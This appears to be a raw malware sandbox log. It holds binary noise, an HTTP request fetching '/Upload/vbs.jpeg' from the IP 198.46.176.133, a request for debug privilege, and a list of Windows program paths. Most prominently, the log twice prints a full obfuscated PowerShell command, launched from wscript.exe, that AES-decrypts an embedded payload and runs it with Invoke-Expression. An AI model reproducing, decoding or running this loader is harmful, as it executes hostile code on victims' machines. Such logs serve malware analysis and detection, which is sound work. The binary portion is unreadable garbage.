ªv½z¢äšPrQâØR²Fÿžs´`â8 ìÚۏá=F2ž¥^¿ Y‹Ð?¦1¢Äw©ÜzfqÞ]OoçœŠª¤–û^Ü*ò^ïœ$/¥PG¾Ï"À82í ÆàxÁ¨v,àsùa ÇpU?Ïë† 1^çŒä)æki[Øprij*‚ŽMàG¦bXØ¢Tà^Iݕl°SúeâÔ*FQ­¯€ÍÏå€3!R¥ékõÊ9gåGPß‘½$†?L$@;ÝÖãðÀ#ˆ ×“”Ô+Õ遡¹<²9Üzbš’$"œÑü6zá‰IH'«‰QCW‘€·–ý¿\j (ff³Í™J¾qcøU‹õȞDj#m7B}° ç’ »OE탒A°ìÇãP(¢õã¾SRQ=eÆ뽸 3‚¥µUƒì}±{e‰¡ÆL“4’?Aƒ¿†;($±¯Žhé'U,Òø¯2㘣rc†Q{¬Ñ&À«É­…Ö¼Æ Ù}ðO0Y-›wCí™Þh.ÜQfž‹SŒð¶£‚F² TiÊ°N@÷¼¦txÕ!÷r>•827¬nÚ¤þ¸„荪Z[ã€ç‚nŽi å6€'ž}±Ík£;’›•õþ™—¢‘à“ib 4<mßc+Úm üÎîÅ´»Pµn°®/Ud¾wnØY ;ŽHÚ«®.X¨ä| ?L›P«!™˜) ¹º
Data received EÐғÁÜ¿ßð½«+—Žc¸|ê}Á”îGLZxµ!È-_š±šO¦vai`Ž@a‹k¼?Zð‡V!J:NÑéßrú‹¶m¶<ÊòYætOUÓçé´:Ùf:råµn¹³§ð·ÓC*£ªù–-ãëXQâxÜ« #ß8ÛŸžlMà:ò<ǖ'UînŸ–F‡Àµ:—eYàZÿoè02B9®8÷=2…H&ÇN¹éÏٍXZiÇ5øØXÿ—7Ù­TK)š ˆ¥3@_¶œ¬šëðÃK:¨¯WaÛ,ð¨µð÷÷À\ ÎÚoœ#@껨‘– (n5BŃ΂ÞvÓ·pé—pKuì0¨wòÅSt¼mnò’,tÇu:EŠ0à¯|*í<›=«A<ç*H<ŽÄ ¨ÛÍ`Š 5°Ç\ŠÆ%°^Hé”0H¡X©õtøàL1+ƒflR¤Šü'œwI¤v–Èõ¬LiÒÈ#õÀJ˜(“×'ËkŠÍ ©ˆ9@ÍÈ{d4Qî ånÈ5C»i¢Ý³¼°¦šïçšmíW(ª:âÏ4}1n=϶N»[ÚùÊVi<溸!×®gm5}°‰š +ß%£dSa—ù©=…Žé4ë2³w€=Î(¬P]uïŒé5>QÛ\¶M¦TȊw(u6•T(KÜO õãØáݤc´S ä“Óã‡T+§[²ÔU@p2Ú ãË/§ÒîpwñÜ *óAo…þÙtf¦Uç¿áÀé4`>ÛàÕǧËM(è]0AFõP[ƒÈ"øùæ’h3 U7óÀPé F,ªI^õx¦®(äbUEW<Vh$©VòPºÛ]r&t—li`ñÀŖ’÷)VÚ8‹Å 9«ª‰sêÛEw¾"ceà‹_|ˆ<Ã`k&-8/¶¬ŽkÒFí!XÜ(n·–Š²‘f•ºŒ HcU­€7^™’æä' ¸ÏBñŸp ÊE×\Åm#%x®+¾ֈE^ ÿLVE]Ö9ÂH´¤‡¾$ól&Þ×xµbAñÎ ǾTRG7•›Rh`I x&Qy$ƚÎH ;à F7:ä’Tt¼»:+(YG$…äÖ–EŠøåƒm~'Œ‚`Ävÿ\\k¹@ŠÄu³GÒåHô®z_’ü:& KÝ?Þ9äãÕBÌ ’¤žâÿ,ßðïÓ&‘ š˜ö2ÒªÙ`C5Ý|ð4åÛ2ìd ¬ÔÀv߃K“T†@Þ;&€"…egñ}"4—ÙAùœËÔø´Ó°òG–¿ïn끽¯Ö.“FӖ ©B rÿ òšm‘®}tâYu”“Ô“ðŽ˜7g–`ú‡g£\Ÿåxì#¤Ó°tðõfR琓c¸±ÇÓnþ!â2I¨j@ëE·ª»ˆ˜uó:->ýT‘¬-©uo–þ–®§¥Öhê¼oQ«‰¡hà”K-‚ z'ÑêdÐêVx³)!w_N°=|QÁ¤Ä"FmʤS ïÚÀ<œÏÔ3W‹HÙ|•ä½PÙØW?žbŸñ×+ïÝæp/=¨åeñ¹Îæ‹Ê^·tºnùàoDÉ4ºX¥]Ñ.•YQϺ]|±yTj4÷ÖÐõ¥ª~g3 ûBï¥DŸG´@Ú7e wä]Þÿˆ"T…?Ùà$nJG#¥šÀwLí¨ñ-.¡ßxÛ³ðU?͛ áџ»BÞD=ÿyü]OÃúâpøé&GVb(¨'©äŒ¬;á+(F¦*ª&Ùyª†7ù`hkbeÓêØ1aå5_û§§Ã<½˜@vÝßlöšŸÐÍ¥˜
Data sent GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 198.46.176.133
Time & API Arguments Status Return Repeated

send

 buffer: GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
socket: 1316
sent: 79
1 79 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
parent_process wscript.exe martian_process powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe